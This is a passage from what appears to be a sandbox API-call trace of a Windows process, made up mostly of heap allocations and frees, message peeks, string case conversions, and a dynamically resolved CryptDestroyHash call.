dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0264.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0264.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0264.756] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0264.756] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0264.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0264.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2120 [0264.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0264.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0264.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0264.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.757] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0264.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0264.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0264.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0264.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.757] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0264.758] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0264.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0264.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0264.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0264.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0c8 [0264.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0264.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b40 [0264.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa020 [0264.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0264.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0264.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7a0 [0264.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f78 [0264.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0264.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0264.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0264.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0264.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa9b0 [0264.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0264.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0264.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0264.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0264.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9dc8 [0264.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0264.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0264.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa008 [0264.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0264.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0264.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0264.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0264.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0264.760] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0264.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0264.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0264.760] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0264.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0264.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0264.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0264.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0264.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0264.761] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0264.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0264.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0264.761] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0264.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0264.761] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0264.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0264.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0264.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0264.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0264.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0264.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0264.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0264.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0264.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0264.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0264.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0264.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0264.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0264.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0264.763] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0264.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0264.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0264.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0264.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0264.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0264.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0264.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0264.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0264.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0264.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0264.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0264.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0264.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0264.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0264.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0264.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0264.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466dd0 [0264.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466dd0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0264.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0264.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0264.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0264.765] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0264.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0264.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0264.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0264.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0264.765] CryptDestroyHash (hHash=0xaa57a0) returned 1 [0264.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0264.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0264.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0264.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0264.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0264.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0264.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0264.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0264.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0264.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0264.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0264.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0264.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0264.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0264.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0264.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0264.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0264.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0264.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0264.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0264.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0264.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0264.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0264.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0264.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0264.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0264.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0264.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0264.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0264.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0264.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0264.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0264.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0264.768] HeapFree (in: hHeap=0x25c0000, 